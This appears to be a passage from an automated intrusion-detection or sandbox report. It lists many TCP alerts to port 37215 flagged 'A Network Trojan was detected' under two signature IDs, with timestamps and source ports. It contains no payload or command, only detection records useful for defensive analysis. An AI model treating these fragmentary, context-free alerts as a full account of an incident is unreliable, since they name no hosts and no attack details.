                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.453543
                SID:2829579
                Source Port:51942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287828
                SID:2835222
                Source Port:41764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.872915
                SID:2835222
                Source Port:44854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265940
                SID:2835222
                Source Port:49634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614174
                SID:2829579
                Source Port:33902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282108
                SID:2829579
                Source Port:42880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929873
                SID:2829579
                Source Port:44930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968741
                SID:2835222
                Source Port:39046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434804
                SID:2829579
                Source Port:47314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466000
                SID:2829579
                Source Port:48756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227660
                SID:2835222
                Source Port:44146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.809651
                SID:2829579
                Source Port:58814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233812
                SID:2829579
                Source Port:51278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843516
                SID:2835222
                Source Port:51974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.555933
                SID:2829579
                Source Port:59572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915060
                SID:2829579
                Source Port:42796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870319
                SID:2829579
                Source Port:57320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928202
                SID:2829579
                Source Port:55476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.459017
                SID:2829579
                Source Port:59628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136838
                SID:2829579
                Source Port:36288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559377
                SID:2829579
                Source Port:47528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833652
                SID:2829579
                Source Port:57976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.550688
                SID:2835222
                Source Port:54998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180541
                SID:2829579
                Source Port:60100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023543
                SID:2835222
                Source Port:48818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945186
                SID:2829579
                Source Port:55140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967308
                SID:2835222
                Source Port:33276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175499
                SID:2829579
                Source Port:58786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915843
                SID:2829579
                Source Port:35994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002084
                SID:2835222
                Source Port:42510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897691
                SID:2835222
                Source Port:47860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898188
                SID:2829579
                Source Port:55790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716323
                SID:2835222
                Source Port:38380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766129
                SID:2835222
                Source Port:45130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782732
                SID:2829579
                Source Port:48364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948757
                SID:2829579
                Source Port:58094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782593
                SID:2829579
                Source Port:57836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113424
                SID:2835222
                Source Port:46844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335760
                SID:2835222
                Source Port:35686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.608896
                SID:2829579
                Source Port:45892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811447
                SID:2835222
                Source Port:38140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685843
                SID:2835222
                Source Port:37020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855926
                SID:2835222
                Source Port:43806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271176
                SID:2829579
                Source Port:44310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.944651
                SID:2835222
                Source Port:37662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166959
                SID:2829579
                Source Port:59650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944702
                SID:2829579
                Source Port:43742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.229215
                SID:2835222
                Source Port:46856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689044
                SID:2835222
                Source Port:57034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653442
                SID:2829579
                Source Port:50346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766795
                SID:2829579
                Source Port:44882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110808
                SID:2829579
                Source Port:55218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228422
                SID:2829579
                Source Port:46402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228603
                SID:2829579
                Source Port:37280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899636
                SID:2835222
                Source Port:33726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767423
                SID:2829579
                Source Port:34172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715283
                SID:2835222
                Source Port:60052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.073759
                SID:2829579
                Source Port:39310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547241
                SID:2835222
                Source Port:58962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669765
                SID:2835222
                Source Port:35920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.769902
                SID:2829579
                Source Port:42114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785425
                SID:2835222
                Source Port:41496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782070
                SID:2835222
                Source Port:41158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.588773
                SID:2829579
                Source Port:34546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583708
                SID:2829579
                Source Port:47510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900125
                SID:2835222
                Source Port:47558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215748
                SID:2829579
                Source Port:33934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.550795
                SID:2829579
                Source Port:56040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.550668
                SID:2829579
                Source Port:37278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.268342
                SID:2835222
                Source Port:46990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.797873
                SID:2829579
                Source Port:49074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617180
                SID:2835222
                Source Port:48374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626496
                SID:2835222
                Source Port:47662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180399
                SID:2835222
                Source Port:43528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712762
                SID:2835222
                Source Port:38734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335228
                SID:2829579
                Source Port:37584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864512
                SID:2835222
                Source Port:57984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026403
                SID:2835222
                Source Port:60252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965326
                SID:2835222
                Source Port:53816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986776
                SID:2835222
                Source Port:49778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531645
                SID:2829579
                Source Port:47338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734624
                SID:2835222
                Source Port:55958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559569
                SID:2829579
                Source Port:43728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653842
                SID:2829579
                Source Port:43424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501172
                SID:2829579
                Source Port:51798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.703322
                SID:2835222
                Source Port:50752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617507
                SID:2829579
                Source Port:36784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113876
                SID:2835222
                Source Port:38354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943265
                SID:2829579
                Source Port:37554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990705
                SID:2835222
                Source Port:38746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178199
                SID:2829579
                Source Port:55196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928437
                SID:2829579
                Source Port:56328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872536
                SID:2829579
                Source Port:54310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177548
                SID:2829579
                Source Port:34382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141249
                SID:2829579
                Source Port:37764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560937
                SID:2829579
                Source Port:60890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963053
                SID:2829579
                Source Port:53758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977755
                SID:2829579
                Source Port:59174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915167
                SID:2835222
                Source Port:38272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.866009
                SID:2835222
                Source Port:33098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222668
                SID:2829579
                Source Port:54358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.149923
                SID:2835222
                Source Port:59674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013188
                SID:2829579
                Source Port:46372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559631
                SID:2835222
                Source Port:53610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782289
                SID:2835222
                Source Port:59508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.211899
                SID:2835222
                Source Port:51560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593605
                SID:2835222
                Source Port:42912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689237
                SID:2829579
                Source Port:43414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224779
                SID:2835222
                Source Port:55356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719892
                SID:2829579
                Source Port:53008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335902
                SID:2829579
                Source Port:36186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135903
                SID:2829579
                Source Port:43300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265186
                SID:2829579
                Source Port:59656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463017
                SID:2829579
                Source Port:53708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597941
                SID:2835222
                Source Port:56808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515561
                SID:2835222
                Source Port:60978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558995
                SID:2829579
                Source Port:42632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500717
                SID:2829579
                Source Port:58842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008519
                SID:2829579
                Source Port:53574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944151
                SID:2829579
                Source Port:41814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867518
                SID:2835222
                Source Port:51584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681676
                SID:2829579
                Source Port:39152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263183
                SID:2829579
                Source Port:46344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472322
                SID:2835222
                Source Port:53876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855153
                SID:2829579
                Source Port:44126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799353
                SID:2835222
                Source Port:44218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857017
                SID:2829579
                Source Port:40352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325329
                SID:2829579
                Source Port:60740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798599
                SID:2829579
                Source Port:56708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915641
                SID:2829579
                Source Port:42434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773083
                SID:2829579
                Source Port:33822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919654
                SID:2829579
                Source Port:51190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517954
                SID:2829579
                Source Port:53458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008922
                SID:2835222
                Source Port:59564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666759
                SID:2835222
                Source Port:52174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465515
                SID:2835222
                Source Port:36782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668740
                SID:2835222
                Source Port:49768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844641
                SID:2829579
                Source Port:39378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276025
                SID:2829579
                Source Port:36864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335689
                SID:2829579
                Source Port:46304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505340
                SID:2835222
                Source Port:48718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519214
                SID:2829579
                Source Port:52522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269740
                SID:2829579
                Source Port:38600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.596772
                SID:2829579
                Source Port:54506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969813
                SID:2835222
                Source Port:38022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281797
                SID:2835222
                Source Port:58846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798425
                SID:2829579
                Source Port:35944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.431060
                SID:2829579
                Source Port:34360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448974
                SID:2835222
                Source Port:56298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.047364
                SID:2829579
                Source Port:50714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618530
                SID:2829579
                Source Port:52784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361877
                SID:2835222
                Source Port:34474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681768
                SID:2835222
                Source Port:43290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557831
                SID:2829579
                Source Port:43270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886224
                SID:2829579
                Source Port:58938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.562331
                SID:2835222
                Source Port:35962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.568999
                SID:2829579
                Source Port:45330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555349
                SID:2829579
                Source Port:56184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942877
                SID:2829579
                Source Port:57402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947486
                SID:2835222
                Source Port:46616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653235
                SID:2829579
                Source Port:38788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420412
                SID:2829579
                Source Port:58926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.913021
                SID:2829579
                Source Port:54706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171086
                SID:2829579
                Source Port:46318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946223
                SID:2835222
                Source Port:35668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701103
                SID:2835222
                Source Port:46828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.722186
                SID:2829579
                Source Port:37006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.112989
                SID:2835222
                Source Port:57144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.664196
                SID:2829579
                Source Port:38100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984205
                SID:2829579
                Source Port:50990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766871
                SID:2829579
                Source Port:37918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762818
                SID:2835222
                Source Port:36968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528391
                SID:2829579
                Source Port:35844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903760
                SID:2835222
                Source Port:34554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715345
                SID:2829579
                Source Port:60136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584132
                SID:2835222
                Source Port:44760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384230
                SID:2829579
                Source Port:36882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.729058
                SID:2835222
                Source Port:40132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233948
                SID:2835222
                Source Port:53306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.894836
                SID:2829579
                Source Port:47018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321137
                SID:2835222
                Source Port:41222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728573
                SID:2829579
                Source Port:34548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872737
                SID:2829579
                Source Port:57402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207638
                SID:2829579
                Source Port:43306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532159
                SID:2835222
                Source Port:37128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288383
                SID:2829579
                Source Port:41432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773198
                SID:2829579
                Source Port:60620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855608
                SID:2835222
                Source Port:60842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559399
                SID:2829579
                Source Port:39500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684561
                SID:2835222
                Source Port:53606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.645625
                SID:2835222
                Source Port:58170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571178
                SID:2829579
                Source Port:56226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701893
                SID:2835222
                Source Port:53654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060907
                SID:2829579
                Source Port:49052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586983
                SID:2829579
                Source Port:46692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899252
                SID:2829579
                Source Port:52864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088326
                SID:2829579
                Source Port:59154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
